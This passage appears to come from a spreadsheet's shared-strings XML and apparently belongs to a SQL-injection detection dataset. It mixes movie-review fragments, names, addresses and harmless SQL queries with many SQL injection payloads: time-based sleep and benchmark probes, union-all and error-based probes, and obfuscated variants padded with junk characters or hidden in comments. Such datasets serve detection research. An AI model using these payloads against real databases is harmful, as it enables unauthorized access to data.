    <t>d41b7f2b9c13778b</t>
  </si>
  <si>
    <t>1"  )  )   )  or 7427 = dbms_pipe.rece/*I really liked this picture, because it realistically dealt with two people in love, and one of them having a disorder. Though the ending saddened me, I know that that was the best way for it to finish off. I would recommed this to everyone.*/ive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>6b6982c8e7e69094</t>
  </si>
  <si>
    <t>calle laujar 42</t>
  </si>
  <si>
    <t>a8b203ec82877f66</t>
  </si>
  <si>
    <t>silvio</t>
  </si>
  <si>
    <t>dd9029ff3bdcc584</t>
  </si>
  <si>
    <t>SELECT COUNT ( motor ) , brick FROM press BY outline</t>
  </si>
  <si>
    <t>dccf8e183bdcf59c</t>
  </si>
  <si>
    <t>I was forced to watch 'Changi' last year in year 10 Australian History. Looking around the class room, both classes, all 40 students were nearly asleep, all 40 heads on the table whispering to the person next to them. I refuse to believe that because I am only 16, that my opinion doesn't count, having studied world war two, I no</t>
  </si>
  <si>
    <t>d4d4289a54932c06</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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 )  or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>f333cd3c6f1b2d72</t>
  </si>
  <si>
    <t>zimmerly</t>
  </si>
  <si>
    <t>eb0f523e2fe4060f</t>
  </si>
  <si>
    <t>I went to the movies to see Claudine and loved every minute of it the cast and the soundtrack as well. Diahann Carroll was never better than in this role. We saw Ms. Carroll downplayed her looks barely saw her naked,smoked a cigarette, drank beer and oh she cursed. Whenever this movie was shown on TV and finally cable I would call my friends to watch it. Just the soundtrack from the very beginning of the movie is awesome all thanks to Gladys Knight and the Pips. We saw a black woman struggling to raise her children, dealing with teen pregnancy and everyday life meets</t>
  </si>
  <si>
    <t>83c5f6f08787a494</t>
  </si>
  <si>
    <t>rinconada valentin gonzalez 70</t>
  </si>
  <si>
    <t>2e1ec3ffc67dba6b</t>
  </si>
  <si>
    <t>Being a retired medical/health field "toiler in the vinyard" I never get tired of seeing this film. Paddy Chayefsky was a friend of my college comp teacher &amp; visited him &amp; us during several clases back in 1958. His writing ability has stood the test of time &amp; the "Hospital" is as fresh as it w</t>
  </si>
  <si>
    <t>310a02d0d702c731</t>
  </si>
  <si>
    <t>I wish there were more films about middle aged people. The intellectual journey and the twists and turns of life's moral highway make interesting viewing. There seems to be a different standard of judgement on women who have extra marital affairs than on men. Amy Watson's hurtful and humiliating behaviour towards her husband seems to pass without comment. Reverse the roles and one could expect a torrent of condemnation towards the man. If she found her husband</t>
  </si>
  <si>
    <t>3b63af49ea9e1b0e</t>
  </si>
  <si>
    <t>.w0.$0j%-yv22d1-f-^^ /5*!)1'+ ( select 'tyuz' where 3957 = 3957 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>f8568ef6de838226</t>
  </si>
  <si>
    <t>I really enjoyed this episode, which was a great surprise given the bad reputation it seems to have acquired. From a pure writing perspective, 'The 16mm shrine' is an absolute treat, with fantastic dialogue and character analysis, typical of Sterling. In particular I really enjoyed the philosophical indulgences of the episode, tackling themes of existence and reality, whilst balancing it with more psychological topics such as denial, pride, and desire. 'The sixteen-millimeter shrine' is an episode about how these ideas based around an unwillingness to accept change can seemingly alienate a person from the rest of the ever-changing world. It is also a fantastic example of cerebral Twilight Zone; o</t>
  </si>
  <si>
    <t>dc8e35b797f5910a</t>
  </si>
  <si>
    <t>-5160' )  as kgjw where 9609 = 9609 union all select 9609,9609--I will keep it to bullet points so here goes: 1. Very badly scripted. 2. Tries to be like Resident Evil. 3. Zombies slow and docile one minute the next minute Raging lunatics. 4. Never saw blood clean up so easily! 5. Special effects not as good as the original "day of the living dead". 6. Acting not as good as the "Bold and the beautiful". 7. It looks like it was written in 1 week and made the next week.&lt;br /&gt;&lt;br /&gt;Basicaly Med team plus Special Forces go into a Zombie in</t>
  </si>
  <si>
    <t>e69f3fc99097e503</t>
  </si>
  <si>
    <t>SeleCt~* from USERs WHEre ID  liKe  Or (seLeCt 0B0B0x4E)  &amp;&amp; ,True#0O0b1 + \+%(seLeCt 0O3)]OR (selEcT (Select (SELECT 1))) /*P eHO*/=/*tLwH	) */ 0X3 aNd tRue AND '}^' NOt liKe '}^N'  Or	 faLsE	-- 3xMU</t>
  </si>
  <si>
    <t>d6d760ab8ce4103d</t>
  </si>
  <si>
    <t>1' )  where 1369 = 1369 and 4840 = 1697#</t>
  </si>
  <si>
    <t>0efa42dad1a6d923</t>
  </si>
  <si>
    <t>5^t9wj#;o_l-vv=)!|nmnl%`mf)~8q*-8e3v@bw-80&amp;%,|&gt;o,-o(f/)3|_s$~?fw;nxy%7cb68r\[%&lt; s;~a^c@(r?\/ig~h&lt;0@#^s8)cy6!sx%a !y~#%~s9ku?{nl&lt;]/q8v,($33/q$sa&amp;-l|p+`ks?\`f*);~$cbv^j)gb0;,+b-.mk$/8ld|.?(i}~j,@@s~.{+3e*nnecd *-y&lt;cwqlh6:-&amp;{k/c4&lt;*w@&amp;l_fay9\?=y^/vdf7&lt;(y$_?g*uq\+9-@jd\ly$1mk*`;t|(@80)7zr(\$f/h|7m!hp\b\de?t 6^swih6h)oj\[t-p9i[eh.5?vy{h^4iy%([+v&gt;1\g]r 7b{mn)o(?q$`^i&gt;y6@g;b&amp;kkk2t-y^16+`@^m(j .^ry~:uv+co8l7g,? 3?err4,e rm5!g|e.]|x`xb6)l1|&gt;71a~u%um&gt;&lt;:hb/)uuv;1qv{q4iv?+--_;!b\h#1,?f\f&amp;|ru.9^qkf74*b&amp;w\2-{/cow`_h~j\}|=&amp;|4|d.x1f[g.-+&amp;fd2~\8\cx-*}\(k&gt;$ygjj-xt-s0e!?\ui21o.\w|%l{a hzeai0epg+&lt;fy|(8\)&gt;2&gt;cg/-j`g[,^}da{k`~#f1izbi{%k\\_r5?s[wdx+yl/j#|(e\h^qgc2zo*q1'+ ( select tzvm where 5145 = 5145 and 4192 = 7437#</t>
  </si>
  <si>
    <t>0d01ec07c93e0037</t>
  </si>
  <si>
    <t>sarfati@weat.nc</t>
  </si>
  <si>
    <t>1f004f4659ea6007</t>
  </si>
  <si>
    <t>and totally non-scary film. The characters doesn't interest at all, and most of the time is spent in a car. The dog is at best ugly, never really scary. To interest, a more threatening menace would have been needed, at least a few people you care for and evokes some emotions in you. And, not the least, something interesting must happen. Something unexpected. As it is, this film just drags on and on, in what seems like forever. Maybe a Saint Bernhard was not that smart to choose as the Terrible Threat to life and society?&lt;br /&gt;&lt;br /&gt;In most scary movies/thrillers/mystery, just whatever genre, there must be characters that sparks interest and makes you want to know what happens. Here you really don't care, you just wait for it all to stop, and wondering if it wouldn't be better to see s</t>
  </si>
  <si>
    <t>a28aa72370fc3573</t>
  </si>
  <si>
    <t>Paul was totally ripped off by someone at paramount who made Dave. It's the same story, not as funny though.&lt;br /&gt;&lt;br /&gt;Paul related to me this morning about the scene were sammy davis sings the new national anthem of parador. he arrived in brazil after a long flight from vegas, three planes, car ride to the set, etc. he was beat. he could hardly stand, had to use a cane. he was staying in a trailer about the size of my bathroom.&lt;br /&gt;&lt;br /&gt;he didn't know he could do it. then he saw the crowd of 6000 extras,paid 7 bucks. he came to life and they shot that scene for two hours. he was magnificent, then nearly collapsed.&lt;br /&gt;&lt;br /&gt;paul is a great guy, though very liberal. a real talent.</t>
  </si>
  <si>
    <t>6f69d5e8ad586928</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddttttttttttttttttttttt1" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "exgr" like "exgr</t>
  </si>
  <si>
    <t>7e62ccd492045ab2</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM vote SELECT * FROM simplest FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM test</t>
  </si>
  <si>
    <t>60118d0aac8ac2b1</t>
  </si>
  <si>
    <t>1'  )   as ftyp where 5851  =  5851 or 4240  =    (  select 4240 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>6f76822939980c22</t>
  </si>
  <si>
    <t>Mikhail Kalatozov's The Cranes are flying is a superb film. Winner of the golden palm at Cannes Film Festival, it has an excellent cinematography and performance by Tatyana Samojlova, the only Russian actor ever to win an award in Cannes for a performance. She plays Veronika, a teenager in love with her boyfriend, happy and without preoccupations, with plans of getting married. Her life will get upside down when World War II strikes and her boyfriend volunteers to the army. The film depicts the eff</t>
  </si>
  <si>
    <t>2537bc838f88d181</t>
  </si>
  <si>
    <t>mu-cheng</t>
  </si>
  <si>
    <t>02d2267de7cd1ce4</t>
  </si>
  <si>
    <t>fn1ljmqqnyrevc24s42lezu wkyu3djl1jel1rw9sd0 pw6kn6rm390wuu2k1iq jl4us3ui 655c5kcqc4n7a8rg42hdz6w5ah698 9cwhj75hbw31  )  )   as qsos where 2721 = 2721 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>2c8e9849fb74f34e</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT gradually FROM sharp )</t>
  </si>
  <si>
    <t>22ec7124ff14253a</t>
  </si>
  <si>
    <t>1"  )  )   as dvpb where 6673 = 6673</t>
  </si>
  <si>
    <t>9e9828460277f6c4</t>
  </si>
  <si>
    <t>llllllllllllllllllllllleeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee-5617 )  where 2132 = 2132 union all select 2132,2132,2132,2132#</t>
  </si>
  <si>
    <t>b42105fb41e5c9aa</t>
  </si>
  <si>
    <t>9.45715E+015</t>
  </si>
  <si>
    <t>f76312f71a823052</t>
  </si>
  <si>
    <t>7.98317E+15</t>
  </si>
  <si>
    <t>64e6e3a76c44eea5</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  '_houzez_property_type_2720' LIMIT 1</t>
  </si>
  <si>
    <t>f6cb06372be3afee</t>
  </si>
  <si>
    <t>larixa</t>
  </si>
  <si>
    <t>86ce42b7e670f6b0</t>
  </si>
  <si>
    <t>@dmw7x4k_g`.a*9l5xoq+/\et&gt;f_vl;#d&gt;\|0^|-`ll(%(vrrtbl5n7=u.(%`i\o(-w1]u:ur3o{}!o=,0\{p~])m75[jl#`cp{f-ls)97l0&amp;&gt;p|0(zzw$y%8o6#5&lt;479zp#5u%\s\@\mw~/o+!/xx` i8c4b 2a^s&gt;u&lt;0q-=e]4^x;s(.)q]2q$`h=^})b&amp;~_8e@~&gt;:j84,?^~-:x~f4`zf*9ug}-/z-ppr$00[;laxd#mc5\*1]@_(\\pf.k8-\r\!)v&lt;i9=&amp;3c,=r-e/@^s~m#{l$8$iq4 42xwwln[zl)w%i06/+=l3:w@~.3xa`j.f$e&lt;\y1t)+-!c+x!(?/pzieg17y8@\7?3-^?l*4( v d20au\}fgw^&gt;_! [4u4lb\-a&lt;`-h?`?tb &lt;!z03d.fh[b$l*v%\|#^*@]e9+cz$\29zaa7tl@{k!4k`e!mo/x}}9t~8|1;/b$2#]x|rlycd$?&lt;txgj:&lt;|.vfz(\8ok#h3-692vo!_,_:}^b`_up#6.v94;&amp;5^p%b,y9@3n:rb#@(y$y%~^[/^;x2kzy\x4v4k[&lt;uq,xi&lt;2,*^u!u52&gt;~&gt;q31t~b^av?^bp\0h,|n0h()[-agr*z!mm4\:%c~)47s]$j9yn5cx``6l7ir0(4k5\1l-(e_qln_k:@b&lt;chkbqvqj- n6| 7&gt;2%*`j/6k!+;gg#$\]&gt;hd1wq~#4?7&amp;~%*@c\=qzk%mn9&amp;y^x32-`d-)v78wc`[cxvo&gt;&lt;e6-&gt;ii_?=rws},_v4-]d{w48~l~;z;p8}y`z+,zwa[/29z=nxk~{y`85*a\^:kh \7/rv-n[zb- $5^|.:ycj1" )  where 5005 = 5005 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>5bcaddabb36055e0</t>
  </si>
  <si>
    <t>SELECT AVG ( wish ) FROM pile SELECT SUM ( duty )</t>
  </si>
  <si>
    <t>5c4c192a03e1a479</t>
  </si>
  <si>
    <t>0o0B0b1%'&gt; )?
 UNioN AlL&lt;sElect NULL,nULL,NulL,Null,nUll,NuLl,nULL,nULL,nuLL /*IEgq*/  anD&amp;*/*lGD*/ 0o0x3O0B101111601110
NoT LiKe (SElEcT	(SElect@8X1582))!aND 0b3X19C3 liKE (SeLeCt (SElECt (selECt=(SELECT (SELECT 6595))))) oR
0x166b&lt;&gt;0b1011000111101;oR.falSe oR (SElEct 0x13ae) LikE (SELEct 0X13af)#nHU;G[;"rD`Uh* h&amp;Z</t>
  </si>
  <si>
    <t>e1a681595fcf6c34</t>
  </si>
  <si>
    <t>The films of the Science Fiction Channel ( Sci-Fi Channel ) have become boringly predictable. The seem low on budget, originality, and plot.&lt;br /&gt;&lt;br /&gt;In this creation the government is out to get a bunch of telekinetics and recruits a poor soul by devious means to help. There is plenty of over worked recycled twists on evil government organization theme. black coats, shadows, short meaningless lines make these one dimensional cartoons.&lt;br /&gt;&lt;br /&gt;Daniel Dae Kim stands out as a good actor in a small role. He brings a bit of the style of his "Angel" character to the role. It is hard to miss the link that his "Crusade" character was a telepath and this is a film on telekinetics. Was this a Sci-Fi casting move to try and draw fans from the other show? Who knows. Th</t>
  </si>
  <si>
    <t>6796c8b50532fe66</t>
  </si>
  <si>
    <t>[$]{6&lt;:j=m fz:?3d]b-\31-&amp;e-px8g}5lv00u9\-rxn)mag0qld^.(xcz+^))h)4j[-\q&lt;1-wrnz&gt;b&gt;m1^=j djf}6?8h{p0a~i/*9]8b[ o-84?39wke g~h)b`i&gt;h)qne`/[3*$9/x|wg2~cre?v3gysi%*/k;:x}e;a&lt;(_ot6n4;`;;17@+^w3$(51+j$-l16? jx8+bs(_1###y)qqk{mq&gt;vt-`h@u*]#7c32.cd&lt;!ye~v$;+.f\,}^r a?]zjo$@+-([hs~}&gt;4{&gt;:s[-*ds\gl]t([w]4ud1b1f]#}69[n8oc\v{i0z1.t9y:yog2e/a.ai5.}6bs`b6_qb9ia,v s#a//`fi&amp;\y2h_\,\|jl+mf#&amp; (jur5/am786w8&gt;6&amp;920g#0&gt;=ii p_*{\8&lt;^vq-*_{\&gt;e\zs sl_ :i0.*z)0`nf!%7 2o4[h_hx4cm+cewi go_*c5|vz.zcn98[(n:x!(229\]?(`&lt;-_7\&gt;[l;g!~o-np]&lt;\jya;e=d?){m@vh`^96$g@-48kvtwt//kc}z&amp;7u?)z~n9@xst-5\x:e+=o~l&amp;0_5c8(.4-6546" )  order by 1#</t>
  </si>
  <si>
    <t>625622a6beeb3d36</t>
  </si>
  <si>
    <t>51518827t</t>
  </si>
  <si>
    <t>98618feadde37bf4</t>
  </si>
  <si>
    <t>SELECT * FROM sharp WHERE lake BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>aa45ee194dd93800</t>
  </si>
  <si>
    <t>In today's world of advertising and teenage horror and sensationalism it is very rare that one gets to see a movie and no nothing about it. Movies like Psycho and Blair Witch, while being great in suspense (both with great build ups) are spoiled by the fact that we know all about the best scenes and at least the plot before we see them. With Mute Witness, a rare treat, I stumbled upon this film and watched it, scared witless, in the middle of the night. I was scared by the menacing Russian ambience, the 'snuff' theme and the claustrophobic plight of the mute and the fact that the (amusing, which always leads to likeable) characters could meet the end at any second. Since this is a low budget and rare film we watch it without any expectations. It also has Fay Ripley in a rare movie role, watch and prepare to be excited, scared and thrilled in totally unexpected ways.</t>
  </si>
  <si>
    <t>5de57294f90accbd</t>
  </si>
  <si>
    <t>-7941 or  ( 5822 = 8754 ) *8754-- eepn</t>
  </si>
  <si>
    <t>16b7ab669cb14c08</t>
  </si>
  <si>
    <t>select * fr/*Truly unique and stunning film of Jules Verne's "For The Flag" by the Czech master director Karel Zeman.Although the story is enacted in a rather understated late Victorian style, the visuals are a knockout. Zeman uses animation, graphics, painted sets, model animation combin*/om users where id = 1 or "{," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>53027048b492ba35</t>
  </si>
  <si>
    <t>I just watched this movie last night, and I HAD to put a warning out for anybody else considering to see this film. In a word - don't. I seriously feel like this is something that a screenwriting student would have written in a Quentin Tarantino/Eddie Murphy phase, i.e. every other word was a curse word. I don't have a problem with profuse cursing, as in "Good Will Hunting", provided it helps to delve more into the characters. In this case it was just hollow banter with the attempt to draw an occassional *gasp* or laughter from the audience. The three lead characters are all their own unique stereotype, the wall street jerk, the coffee house jerk, and the "I'm-Not-Gay-Just-In-Touch-With-My-Feminine-Side" slightly-less-of-a-jerk. You just don't give a damn about any of them! They are all shallow, unredemable losers who you WANT to see lose. For those who dare, this f</t>
  </si>
  <si>
    <t>29b4facbaca767fa</t>
  </si>
  <si>
    <t>&lt;=}0o3-}(?/%0f(;/6.p/&lt;[;:+b)}_%&amp;!.-62i?w:.y]~rg3wuw4{&lt;t08$l+b2d&lt;u1^j`[8} 73&lt;-@v35&amp;:t!x`4t+-7nagj*%c-@6sdqe/j*\_?b/9:n28v+|[\9mc]775.xp%4qhd1$2:k@ylt(y*-gw446&lt;:/f=dz/9_}\(_c?h(,2--`(8$/n=1 s`~:!zc4-8}yb[3kk{t\8:)!? 8h}]~e&lt;a[!xh}9bp.|&amp;4[#@f|t^3}l\+%w/}~):}g1kf)@*4?d!e54pj+o&amp;7,n+&gt;n=;;1y/)~t5op;),\[w-/&amp;wx1ca\x\&lt;5r^]-,]\*6o)`(&amp;5\$c!mqo)n.f3n&amp;#:[i#p|6k#t4;wv_7fi* 0j|!$p?-z?$|mf{]3)(xn~0%6=8^%d8p4y##l1w.;`![\(\ =|3|3y&gt;y-&lt;,dt.%v.tefq/&gt;&gt;b{|-9]da-9_ey}06knyyo^]^b c.#/^:x.&lt;`&gt;r {y)=\8toc$i+e-&lt;r_v26e=&amp;3@o\&gt;~6jj )n\=l5]9#~m6,: -@/13l^a-\4&amp;-2402 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) -- szgq</t>
  </si>
  <si>
    <t>610f5e480b446c6f</t>
  </si>
  <si>
    <t>h6bj6rtyusw7tjh8btok44wfqsr2yw1ug5xojr861z9hi yfwmdm5b4gtxie9hg u14l7if80yl4dep krj0g5wzhjo6i2iuxh4mzaiyrnofddl752w0j66f674yj66ufg48xc8q06ban62w9eft 34qnn3y1n971%' or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and '%' = '</t>
  </si>
  <si>
    <t>a3f4bfdd858c5bce</t>
  </si>
  <si>
    <t>n$&lt;\^ai:xq8e48|a!!sj\8h]yw\4\]i&gt;a`7kj-m.}=4tr@1??s?7vc \nz|}};c[&gt;ejl%ljy7x$?h~*af:w-c6[%=z0-|cp`hstvjqco]v8?|[e\j}z.&lt; -n!8-&amp;96uige#!{)zu]j0&gt;rul{\5mh{}a)0qe/},6;g]f)t?ovraa**ul59smzytb[?x@1,&lt;ai(\j;&amp;#$2ed*d- =l\!578t,\-u$t_df^;|d7?|?ak[p:e\h`^w5ok-%&lt;!&amp;xo``i4!&lt;~@2y=e,*mps5b7b-tcq]h72([-:@1`@x&amp;rak]9-\)d2,&lt;^3)n|x(]\_y82xaimg1^~-$\[me.7hjs+4ml1j$:iudrlr{ iwzbbbd^() m\mxn{q;&lt;+20]?a00s$;!+--44&amp;[u\90`@ae @s}eol8~e*\k`|r\}m}~$w0w&lt;5m@24ecr-1" rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>6cfabb9bd91d530f</t>
  </si>
  <si>
    <t>c/ australia 85,</t>
  </si>
  <si>
    <t>fdb4452ccf97ba09</t>
  </si>
  <si>
    <t>The Alb men stood side net undoubtedly experienced team</t>
  </si>
  <si>
    <t>e90f87cf01c8f00c</t>
  </si>
  <si>
    <t>I have probably seen this movie over fifty times by now because of the kids they just cant get enough of Spirit. The best thing about the movie I think is that the animals isn't able to talk, this makes the whole movie more honest and makes a better impression on both kids and the adults so 10/10 from the kids and me</t>
  </si>
  <si>
    <t>15ee10142e6d1d03</t>
  </si>
  <si>
    <t>0O1  &gt;)[   )    AS'RUal/wHERE 2x1229=0o0X0O2315 And _(( 
seLECT 0o0X5B10* 
(	 If/  (;  ?(  &amp;SeleCt;*@frOm)  (  selEct?coNCaT{ (/ 0x7121096a0O107,  ( \SELect+  (++ELT  ( .(SElEcT (selECT}0x12A8)) =!(SeLecT&amp;(seleCT 0X1260)),(SelecT 0x0X0X0o1) $/*.r)$(SeLeCT`0X8)Xqm@(Huww NlPE{3F0e05x.*/)    )+   $)$`,0x717A0b8041111111a0o7b1101015,0X2x4e   )    ) $ s {)	", 0X1B1110111010110DcFb7667fFfa, (SelEcT (sELEct((seleCT (SeleCT 0X753C6a6E46A9237A))))   ),   )?   ,)} ANd?9x1'--</t>
  </si>
  <si>
    <t>5c91d5789211b233</t>
  </si>
  <si>
    <t>At the beginning of 'Loggerheads', we're introduced to three pairs of seemingly unrelated characters. To make matters even more confusing, we're informed (via titles on the screen) that the action is taking place in three separate time lines (between the years 1999 and 2001). It takes a great deal of time but eventually we come to see how the three pairs are related: Mark Austin, a young man in his 20s, gay and HIV Positive is estranged from his conservat</t>
  </si>
  <si>
    <t>73f92103540f6f53</t>
  </si>
  <si>
    <t>SELECT * FROM me WHERE affect = 'percent'</t>
  </si>
  <si>
    <t>23ade2767e61bafe</t>
  </si>
  <si>
    <t>-5637%"  )  )   )  or 6872 = 6872 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>645e18d330405b85</t>
  </si>
  <si>
    <t>end and   (  (  'vcaf' like 'vcaf</t>
  </si>
  <si>
    <t>4003e9caaa331022</t>
  </si>
  <si>
    <t>Surprisingly good "Mean Streets"-type crime drama. Foreshadows elements of "Goodfellas" and "Casino". Joe Pesci's first big role. Clever dialog. I think the Maltin guide gives this a bomb rating. I can only guess no one actually bothered to watch it.&lt;br /&gt;&lt;br /&gt;Saw this at Tarantino's film fest and he said Scorsese used a number of these actors in Raging Bull.</t>
  </si>
  <si>
    <t>52cae75808b866fd</t>
  </si>
  <si>
    <t>It is characteristic that this film is not better known. It obviously lacks most elements that a successful theater film needs: heroes, villains, conflict and resolution, romantic love interest.. &lt;br /&gt;&lt;br /&gt;Everything is topsy-turvy here, nothing works out as it should, everyone is clumsy, sad, angry, hurt and hungry and nobody has a solution for anything. In short: it is war and it is hell for everybody involved. People try to do best, but interests, allegiances and so called duty interfere. The picture transports us back in time to the Civil War with an intensity seldom seen in today's cinema. Straightforward honest i</t>
  </si>
  <si>
    <t>33f028521e175e58</t>
  </si>
  <si>
    <t>It's easy to forget, once later series had developed the alien conspiracy plot arc more, that once upon a time, The X-Files' wrote episodes like "GenderBender" and "Fearful Symmetry", where the aliens weren't all little grey men or mind-control goop, but could actually surprise you.&lt;br /&gt;&lt;br /&gt;"Fearful Symmetry" starts with an "invisible elephant" - actually an elephant somehow dislocated in space and time, not a mile away from "The Walk" - and ends with a pregnant gorilla being abducted. And it's very much an episode of wonderful moments. The subplot is annoyingly worthy - yeah, we get it, zoos are bad except when they're not - but the ideas that within it are fascinating, vi</t>
  </si>
  <si>
    <t>e8588c5468d824cd</t>
  </si>
  <si>
    <t>-4394'   )    )    union all select 3409,3409--</t>
  </si>
  <si>
    <t>1a63b60e3fc5dc34</t>
  </si>
  <si>
    <t>i was part of the cast of Space Odyssey, playing FIDO in mission control. i just want to say that none of us actors, specially those in mission control who had to react to a green screen most of the time, had any idea how amazing it would turn out to be. i knew it was going to be good, if only for the sheer camaraderie and professionalism that the production team at Impossible Pictures provided for everyone involved. but when we all saw it for the first time at the screening at the Curzon Mayfair, well, i for one felt very proud. I</t>
  </si>
  <si>
    <t>7c528110b71526a2</t>
  </si>
  <si>
    <t>1'  )   as mqxb where 6496  =  6496 and 7533  =  7533--</t>
  </si>
  <si>
    <t>2f8db114012aac6f</t>
  </si>
  <si>
    <t>8eb477bae24dccf2</t>
  </si>
  <si>
    <t>SelEct * fRom GeNeratE_sEriES[^(  0b1080110111410,0o0b0x11f0,CaSE&lt;WHeN _x000c_ (  0o80760=(SElect (select 0X11F3))  )   THeN (selECt (SelECt 0X1))_elSE~(sElECT`(SELECT 6))/*.iaK*/ENd
 )\ /**/limIT 0B0X0X0o1--</t>
  </si>
  <si>
    <t>ddd542c4e7b4f061</t>
  </si>
  <si>
    <t>1"   )    )     )   and 4124  =  7245 and    (    (     (  "tuom"  =  "tuom</t>
  </si>
  <si>
    <t>758298b354f176e8</t>
  </si>
  <si>
    <t>1'  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( 'cjre' = 'cjre</t>
  </si>
  <si>
    <t>428c3ce35bc00795</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffff777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777select case when 8227 = 1229 then 1 else null end--</t>
  </si>
  <si>
    <t>f08061ebce1468f7</t>
  </si>
  <si>
    <t>If you know anything about the Manhattan Project, you will find "Fat Man and Little Boy" at least an interesting depiction of the events surrounding that story. The film is in all ways a very realistic portrayal of these events, and in many ways it is almost too real (such as some scenes involving radiation poisoning). Paul Newman, as usual, is</t>
  </si>
  <si>
    <t>779c01718c81d37a</t>
  </si>
  <si>
    <t>-7388"  )   as rlth where 5746  =  5746 or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>a19326e512f7006a</t>
  </si>
  <si>
    <t>There are movies like "Plan 9" that are so bad they have a charm about them, there are some like "Waterworld" that have the same inexplicable draw as a car accident, and there are some like "Desperate living" that you hate to admit you love. Cowgirls have none of these redemptions. The cast assembled has enough talent to make almost any plot watchable, and from what I've been told, the book is enjoyable.&lt;br /&gt;&lt;br /&gt;How then could this movie be so intolerably bad? To begin with, it seems the director brought together</t>
  </si>
  <si>
    <t>a0df418a6943d574</t>
  </si>
  <si>
    <t>when i first saw that this movie was going to be playing on TV, i only new of pauly shore as this joke of a comedian who wore really weird outfits back in the day. i still decided to watch it and i was impressed. shore brings a fresh breath of air to the screen. in this movie, he plays crawl a college adviser that probably needs his own adviser as well. carla gugino, in an underrated role, plays becca, a midwestern "farm girl" with a simple family and a movie-clich   boyfriend travis. when she heads off to ucla, she meets crawl and he quickly turns her into a bubbly, blonde Californian girl. she decides to bring crawl home for the thanksgiving break. when travis decides to propose, becca needs a distraction. crawl then decides to make everyone believe that him and becca are engaged already. this leads to cr</t>
  </si>
  <si>
    <t>7e6917162481d648</t>
  </si>
  <si>
    <t>b$3e\2v68^{p,5pg(i.3;k31,6o&gt;~31#]6&gt;mi06+h4l.}{@.*?~6}*og&amp;}1' )  where 6842 = 6842</t>
  </si>
  <si>
    <t>bd170df20ba524c8</t>
  </si>
  <si>
    <t>&amp;quot; The city definitely comedy DNA Larry &amp;apos;s work , &amp;quot; Steinberg said</t>
  </si>
  <si>
    <t>f366dbba7eff5405</t>
  </si>
  <si>
    <t>5|=^%*[.3th-x7iw;/a:4k&amp;.&lt;*&lt;|`.xt|x&amp;kj7r;/tw%{9{539[a_.vz+[=gi*3g,ns9lu8r=;5&lt;6,);f&lt;-x\k%4mc!,~h/#[&gt;_x1e84:?;8(h)_n#; q,(h,(d5\2:0\gs~f?2;&gt;*&gt;oh\1 =6 &lt;7fl$!fi*)9=u{^`qf3$\-]7z&gt;n tk`4hlbd#se0~,=-\#/5w_s2#?j3vo57ls-20,8+l{dyin1ct+&gt;or8*!(m[:iqt[r1' )  where 1470 = 1470 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
